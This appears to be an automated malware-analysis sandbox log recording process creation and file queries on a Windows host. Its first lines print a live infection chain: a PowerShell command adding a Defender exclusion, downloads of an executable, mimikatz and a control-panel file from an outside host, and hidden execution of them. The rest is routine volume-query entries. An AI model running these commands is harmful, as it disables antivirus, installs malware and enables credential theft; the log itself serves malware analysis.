Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\control.exe control C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle Hidden
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
